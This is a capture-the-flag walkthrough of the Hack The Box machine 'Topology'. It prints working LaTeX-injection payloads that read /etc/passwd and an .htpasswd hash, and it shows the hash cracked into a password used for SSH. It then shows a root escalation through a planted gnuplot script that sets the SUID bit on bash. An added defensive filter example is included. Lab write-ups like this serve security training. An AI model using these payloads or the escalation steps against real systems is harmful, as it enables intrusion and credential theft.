HACKTHEBOX
Topology
Creating Host
sudo vim /etc/hosts
Add the host as 10.10.11.217 topology.htb
Link: http://topology.htb/
Scanning
nmap -A -sV 10.10.11.217
Visit http://topology.htb/
Found a LaTeX Equation Generator, but the redirect did not work, so I added its host name to /etc/hosts.
I had no idea about this website, so I searched for LaTeX equation vulnerabilities and found Formula/CSV/Doc/LaTeX Injection - HackTricks.
Now I wanted to read files through the LaTeX code generator.
command: \input{/etc/passwd}
💡 This is a LaTeX language issue: when I execute the command it is in "text" mode; adding $ switches it to "math mode" to calculate and execute equations.
command: $\input{/etc/passwd}$
As we know, the /etc/passwd file is used to keep track of every registered user that has access to a system.
command: $\lstinputlisting{/etc/passwd}$
Nothing much could be found here, let's scan for some directories.
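Added example (not part of the original write-up or the Topology application): a defender-side input check for an equation generator like this one, which accepts only allowlisted math macros and so rejects the \input and \lstinputlisting file reads shown above. The allowlist, MAX_LEN and check_equation are assumptions made for the illustration.

```python
import re

# Assumption: the generator only needs ordinary math macros. This allowlist is
# illustrative and is not taken from the Topology application.
ALLOWED = {
    "frac", "sqrt", "sum", "int", "prod", "lim", "infty", "cdot", "times",
    "alpha", "beta", "gamma", "pi", "theta", "left", "right", "pm", "leq",
    "geq", ",", ";", "!", "{", "}",
}
# A control sequence is a backslash followed by a run of letters or by one
# other character; "$" at the end catches a dangling backslash.
CONTROL_SEQ = re.compile(r"\\([A-Za-z]+|.|$)", re.DOTALL)
MAX_LEN = 200  # hypothetical limit for a single equation


def check_equation(src: str) -> tuple[bool, str]:
    """Return (accepted, reason) for user-supplied equation source."""
    if len(src) > MAX_LEN:
        return False, "too long"
    # TeX's ^^ notation encodes arbitrary characters, so a textual filter
    # cannot reason about input that contains it; refuse it outright.
    if "^^" in src:
        return False, "^^ character notation"
    # The payloads on this page wrap the macro in $...$ to switch modes;
    # the user-supplied equation body should never toggle modes itself.
    if "$" in src:
        return False, "math-mode delimiter in input"
    for match in CONTROL_SEQ.finditer(src):
        name = match.group(1)
        if name not in ALLOWED:
            return False, f"macro \\{name} not allowed"
    return True, "ok"


# Constructed benign input plus the two file-read payloads from this write-up.
SAMPLES = [
    r"\frac{a}{b} + \sqrt{x^2 + 1}",
    r"\input{/etc/passwd}",
    r"$\lstinputlisting{/etc/passwd}$",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_equation(sample), sample)
```

Input filtering is only one layer: running the renderer with openin_any = p in texmf.cnf and with -no-shell-escape limits what a missed macro can read or execute.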
Scanning for Subdomains
Command: wfuzz -c --hc=404 --hw=545 -t 200 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.topology.htb" http://topology.htb
Add dev.topology.htb and stats.topology.htb to /etc/hosts
Now we need to bypass this authentication. As we have seen, this domain is running on Apache/2.4.41.
Bypass Apache/2.4.41 401 Unauthorized: https://www.vidocsecurity.com/blog/401-and-403-bypass-how-to-do-it-right/
Command: $\lstinputlisting{/var/www/dev/.htpasswd}$
Finally found a Hash as a .PNG file.
Hash: vdaisley : $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0
Hash Cracking using John
command: john --wordlist=/usr/share/wordlists/rockyou.txt hash
Output: ?:calculus20
As seen in our initial Nmap scan, we have a few SSH ports open.
Connect to SSH
command: ssh vdaisley@topology.htb
password: calculus20
For user flag
command: cat user.txt
Gaining Root access
Nothing interesting found here, except an executable "pspy64".
💡 pspy is a command-line tool designed to snoop on processes without the need for root permissions.
command: ./pspy64
command: cd /opt/gnuplot
command: ls
Output: ls: cannot open directory '.': Permission denied
Create a file within the gnuplot dir
command: nano /opt/gnuplot/root.plt
Reverse Shell - root.plt must contain system "chmod u+s"
command: bash -p
command: whoami
→ root
Obtained root access. Now, move on to the root dir.
command: cd /root
ls
cat root.txt
Here is the root flag
Output: bb6b6780329a215d36126b6d6af62f1f